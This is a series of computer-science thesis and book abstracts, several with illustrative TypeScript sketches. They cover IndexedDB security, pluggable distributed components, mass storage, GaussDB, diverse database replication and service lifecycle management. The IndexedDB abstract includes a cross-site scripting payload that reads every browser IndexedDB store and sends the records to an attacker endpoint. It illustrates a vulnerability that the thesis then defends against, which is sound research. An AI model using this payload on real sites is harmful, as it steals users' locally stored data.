An Investigation into Possible Attacks on HTML5 IndexedDB and their Prevention
This thesis presents an analysis of, and an enhanced security model for, IndexedDB, the persistent HTML5 browser-based data store. In versions of HTML prior to HTML5, web sites used cookies to track user preferences locally. Cookies, however, are limited both in file size and number, and must also be added to every HTTP request, which increases web traffic unnecessarily. Web functionality has increased significantly since cookies were introduced by Netscape in 1994. Consequently, web developers require additional capabilities to keep up with the evolution of the World Wide Web and the growth of eCommerce. The response to this requirement was the IndexedDB API, which became an official W3C Recommendation in January 2015. The IndexedDB API includes an Object Store, indices, and cursors, and so gives HTML5-compliant browsers a transactional database capability. Furthermore, once downloaded, IndexedDB data stores do not require network connectivity, which permits mobile web-based applications to work without a data connection. Since such IndexedDB data stores will be used to store customer data, they will inevitably become targets for attackers.
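The transactional primitives named above (Object Store, indices, cursors) are exposed through an asynchronous browser API. The following is a minimal TypeScript sketch of those primitives; the database, store, and field names are illustrative and are not taken from the thesis.

```typescript
// Minimal sketch of the IndexedDB primitives described above: an object
// store, a secondary index, and a cursor scan. All names are illustrative.
const open = indexedDB.open("shopDB", 1);

open.onupgradeneeded = () => {
  const db = open.result;
  // Object store keyed on "id", with a secondary index on "email".
  const store = db.createObjectStore("customers", { keyPath: "id" });
  store.createIndex("by_email", "email", { unique: true });
};

open.onsuccess = () => {
  const db = open.result;
  const tx = db.transaction("customers", "readwrite");
  const customers = tx.objectStore("customers");
  customers.put({ id: 1, email: "a@example.com", name: "Alice" });

  // Cursor scan over the index; once populated, the store is readable
  // without any network connectivity.
  customers.index("by_email").openCursor().onsuccess = (e) => {
    const cursor = (e.target as IDBRequest<IDBCursorWithValue | null>).result;
    if (cursor) {
      console.log(cursor.value);
      cursor.continue();
    }
  };
};
```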
This thesis firstly argues that the design of IndexedDB makes it unavoidably insecure. That is, every implementation is vulnerable to attacks such as Cross Site Scripting, and even data that has been deleted from databases may be stolen using appropriate software tools. This is demonstrated experimentally on both mobile and desktop browsers. IndexedDB is however capable of high performance even when compared to servers running optimized local databases. This is demonstrated through the development of a formal performance model. The performance predictions for IndexedDB were tested experimentally, and the results showed high conformance over a range of usage scenarios. This implies that IndexedDB is potentially a useful HTML5 API if the security issues can be addressed.
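The crux of the XSS argument is that IndexedDB is guarded only by the same-origin policy, so any script injected into a vulnerable page runs with full read access to the origin's data stores. A hedged sketch of such an exfiltration payload is shown below; the endpoint and all names are hypothetical, and the indexedDB.databases() enumeration call is not available in every browser.

```typescript
// Sketch of why XSS defeats IndexedDB's same-origin protection: an injected
// script runs as the origin, so it can simply open and read every store.
// The attacker endpoint is hypothetical.
indexedDB.databases?.().then((dbs) => {
  for (const info of dbs) {
    const req = indexedDB.open(info.name!);
    req.onsuccess = () => {
      const db = req.result;
      for (const storeName of Array.from(db.objectStoreNames)) {
        const getAll = db.transaction(storeName).objectStore(storeName).getAll();
        getAll.onsuccess = () =>
          // Ship every record to an attacker-controlled endpoint.
          fetch("https://attacker.example/collect", {
            method: "POST",
            body: JSON.stringify({ store: storeName, rows: getAll.result }),
          });
      }
    };
  }
});
```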
In the final component of this thesis, we propose and implement enhancements that correct the security weaknesses identified in IndexedDB. The enhancements use multifactor authentication, and so are resistant to Cross Site Scripting attacks. These enhancements are then demonstrated experimentally, showing that HTML5 IndexedDB may be used securely both online and offline. This implies that secure, standards-compliant, browser-based applications with persistent local data stores may be both feasible and efficient.
Adaptive object management for distributed systems
This thesis describes an architecture supporting the management of pluggable software components and evaluates it against the requirement for an enterprise integration platform for the manufacturing and petrochemical industries. In a distributed environment, we need mechanisms to manage objects and their interactions. At the least, we must be able to create objects in different processes on different nodes; we must be able to link them together so that they can pass messages to each other across the network; and we must deliver their messages in a timely and reliable manner. Object-based environments which support these services already exist, for example ANSAware (ANSA, 1989), DEC's ObjectBroker (ACA, 1992), and Iona's Orbix (Orbix, 1994). Yet such environments provide limited support for composing applications from pluggable components. Pluggability is the ability to install and configure a component into an environment dynamically when the component is used, without specifying static dependencies between components when they are produced. Pluggability is supported to a degree by dynamic binding: components may be programmed to import references to other components and to explore their interfaces at runtime, without using static type dependencies. Yet this overloads the component with the responsibility to explore bindings. What is still generally missing is an efficient general-purpose binding model for managing bindings between independently produced components. In addition, existing environments provide no clear strategy for dealing with fine-grained objects. The overhead of runtime binding and remote messaging will severely reduce performance where there are many objects with complex patterns of interaction. We need an adaptive approach to managing configurations of pluggable components according to the needs and constraints of the environment. Management is made difficult by embedding bindings in component implementations and by relying on strong typing as the only means of verifying and validating bindings. To solve these problems we have built a set of configuration tools on top of an existing distributed support environment. Specification tools facilitate the construction of independent pluggable components. Visual composition tools facilitate the configuration of components into applications and the verification of composite behaviours. A configuration model is constructed which maintains the environmental state. Adaptive management is made possible by changing the management policy according to this state. Such policy changes affect the location of objects, their bindings, and the choice of messaging system.
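To make the binding model concrete, the TypeScript sketch below separates components, which declare named ports, from a configuration layer that resolves bindings at assembly time; the interfaces are invented for illustration and are not the thesis's actual specification or composition tools.

```typescript
// Illustrative sketch (not the thesis's tools): components declare required
// ports, and a configuration layer, rather than the components themselves,
// resolves the bindings.
interface Port {
  send(msg: unknown): void;
}

// A pluggable component: it sends through named ports but carries no static
// dependency on any concrete peer.
class Component {
  private ports = new Map<string, Port>();
  constructor(readonly name: string) {}
  bind(port: string, target: Port): void {
    this.ports.set(port, target);
  }
  send(port: string, msg: unknown): void {
    const p = this.ports.get(port);
    if (!p) throw new Error(`${this.name}: unbound port '${port}'`);
    p.send(msg);
  }
  receive(msg: unknown): void {
    console.log(`${this.name} received`, msg);
  }
}

// The configuration model maintains the environmental state and can rebind
// components (location, binding, messaging) without modifying them.
class Configuration {
  private components = new Map<string, Component>();
  register(c: Component): void {
    this.components.set(c.name, c);
  }
  connect(from: string, port: string, to: string): void {
    const dst = this.components.get(to)!;
    this.components.get(from)!.bind(port, { send: (m) => dst.receive(m) });
  }
}

const config = new Configuration();
const sensor = new Component("sensor");
const logger = new Component("logger");
config.register(sensor);
config.register(logger);
config.connect("sensor", "out", "logger"); // binding chosen by configuration, not code
sensor.send("out", { reading: 42 });
```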
Sixth Goddard Conference on Mass Storage Systems and Technologies Held in Cooperation with the Fifteenth IEEE Symposium on Mass Storage Systems
This document contains copies of those technical papers received in time for publication prior to the Sixth Goddard Conference on Mass Storage Systems and Technologies, held in cooperation with the Fifteenth IEEE Symposium on Mass Storage Systems at the University of Maryland-University College Inn and Conference Center, March 23-26, 1998. As one of an ongoing series, this Conference continues to provide a forum for discussion of issues relevant to the management of large volumes of data. The Conference encourages all interested organizations to discuss long-term mass storage requirements and experiences in fielding solutions. Emphasis is on current and future practical solutions addressing issues in data management, storage systems and media, data acquisition, long-term retention of data, and data distribution. This year's discussion topics include architecture, tape optimization, new technology, performance, standards, site reports, and vendor solutions. Tutorials will be available on shared file systems, file system backups, data mining, and the dynamics of obsolescence.
Database Principles and Technologies – Based on Huawei GaussDB
This open access book contains eight chapters that deal with database technologies, including the development history of databases, database fundamentals, an introduction to SQL syntax, the classification of SQL syntax, database security fundamentals, the database development environment, database design fundamentals, and the application of Huawei's cloud database product GaussDB. This book can be used as a textbook for database courses in colleges and universities, and is also suitable as a reference book for the HCIA-GaussDB V1.5 certification examination. The Huawei GaussDB (for MySQL) used in the book is a Huawei cloud-based, high-performance, highly applicable relational database that fully supports the syntax and functionality of the open-source database MySQL. All the experiments in this book can be run on this database platform. As the world's leading provider of ICT (information and communication technology) infrastructure and smart terminals, Huawei offers products ranging from digital data communication, cyber security, wireless technology, data storage, cloud computing, and smart computing to artificial intelligence.
Performance Implications of Using Diverse Redundancy for Database Replication
Using diverse redundancy for database replication is the focus of this thesis. Traditionally, database replication solutions have been built on the fail-stop failure assumption, i.e. that crashes cause the majority of failures. However, recent findings refuted this common assumption, showing that many faults cause systematic non-crash failures. These findings demonstrate that the existing, non-diverse database replication solutions, which use replicas of the same database server product, are ineffective fault-tolerant mechanisms. At the same time, the findings motivated the use of diverse redundancy (where different database server products are used) as a promising way of improving dependability. It seems that a fault-tolerant server built with diverse database servers would deliver improvements in availability and failure rates compared with the individual database servers or their replicated, non-diverse configurations.
Besides the potential for improving dependability, one would like to evaluate the performance implications of using diverse redundancy in the context of database replication. This is the focal point of the research. The work performed to that end can be summarised as follows:
- We conducted a substantial performance evaluation of database replication using diverse redundancy. We compared its performance with that of various non-diverse configurations as well as non-replicated databases. The experiments revealed systematic differences in the behaviour of diverse servers, which point to the potential for performance improvement when diverse servers are used. Under particular workloads, diverse servers performed better than both non-diverse and non-replicated configurations.
- We devised a middleware-based database replication protocol which provides dependability assurance and guarantees database consistency. It uses an eager, update-everywhere approach for replica control (a simplified sketch of this scheme follows the list). Although we focus on the use of diverse database servers, the protocol can be used with database servers from the same vendor too. We provide the correctness criteria of the protocol. Different regimes of operation of the protocol are defined, which allow it to be dynamically optimised for either dependability or performance improvements. Additionally, it can be used in conjunction with high-performance replication solutions.
- We developed an experimental test harness for performance evaluation of different database replication solutions. It enabled us to evaluate the performance of the diverse database replication protocol, e.g. by comparing it against known replication solutions. We show that, as expected, the improved dependability exhibited by our replication protocol carries a performance overhead. Nevertheless, when optimised for performance improvement our protocol shows good performance.
- In order to minimise the performance penalty introduced by replication, we propose a scheme whereby the database server processes are prioritised, delivering performance improvements in cases of low to modest resource utilisation.
- We performed an uncertainty-explicit assessment of database server products. Using an integrated approach, where both performance and reliability are considered, we rank different database server products to aid selection of the components for a fault-tolerant server built out of diverse databases.
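As referenced in the second item above, the following TypeScript sketch illustrates the general shape of an eager, update-everywhere replica control scheme; the Replica interface and the commit discipline shown are assumptions for illustration, not the thesis's actual protocol.

```typescript
// Hedged sketch of eager, update-everywhere replica control: the middleware
// applies each statement on every replica (possibly diverse DBMS products)
// and commits only if all replicas succeed; any failure aborts everywhere.
interface Replica {
  name: string; // e.g. two diverse database server products
  execute(sql: string): Promise<void>;
  commit(): Promise<void>;
  abort(): Promise<void>;
}

async function replicatedTransaction(
  replicas: Replica[],
  statements: string[],
): Promise<void> {
  try {
    // Eager: every replica executes each statement before the client
    // observes a commit, keeping the copies mutually consistent.
    for (const stmt of statements) {
      await Promise.all(replicas.map((r) => r.execute(stmt)));
    }
    await Promise.all(replicas.map((r) => r.commit()));
  } catch (err) {
    await Promise.all(replicas.map((r) => r.abort().catch(() => undefined)));
    throw err;
  }
}
```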
Architecture and implementation of online communities
Thesis (Ph.D.) -- Massachusetts Institute of Technology, Dept. of Electrical Engineering and Computer Science, 1999. Includes bibliographical references. By Philip Greenspun.
A Reference Architecture for Service Lifecycle Management – Construction and Application to Designing and Analyzing IT Support
Service-orientation and the underlying concept of service-oriented architectures are a means to successfully address the need for flexibility and interoperability of software applications, which in turn leads to improved IT support of business processes. With a growing level of diffusion, sophistication and maturity, the number of services and interdependencies is gradually rising. This increasingly requires companies to implement a systematic management of services along their entire lifecycle. Service lifecycle management (SLM), i.e., the management of services from the initiating idea to their disposal, is becoming a crucial success factor.
Not surprisingly, the academic and practice communities increasingly postulate comprehensive IT support for SLM to counteract the inherent complexity. The topic is still in its infancy, with no comprehensive models available that help evaluate and design IT support in SLM. This thesis presents a reference architecture for SLM and applies it to evaluating and designing SLM IT support in companies. The artifact, which largely resulted from consortium research efforts, draws from an extensive analysis of existing SLM applications, case studies, focus group discussions, bilateral interviews and existing literature.
Formal procedure models and a configuration terminology allow adapting and applying the reference architecture to a company's individual setting. Corresponding usage examples prove its applicability and demonstrate the arising benefits within various SLM IT support design and evaluation tasks. A statistical analysis of the knowledge embodied within the reference data leads to novel, highly significant findings. For example, contemporary standard applications do not yet emphasize the lifecycle concept but rather tend to focus on small parts of the lifecycle, especially on service operation. This forces user companies either into a best-of-breed or a custom-development strategy if they are to implement integrated IT support for their SLM activities. SLM software vendors and internal software development units need to undergo a paradigm shift in order to better reflect the numerous interdependencies and increasing intertwining within services' lifecycles. The SLM architecture is a first step towards achieving this goal. Content overview:
1 Introduction
2 Foundations
3 Architecture Structure and Strategy Layer
4 Process Layer
5 Information Systems Layer
6 Architecture Application and Extension
7 Results, Evaluation and Outlook
Data mining industry: emerging trends and new opportunities
Thesis (M.Eng.) -- Massachusetts Institute of Technology, Dept. of Electrical Engineering and Computer Science, June 2000. Includes bibliographical references (leaves 170-179). By Walter Alberto Aldana.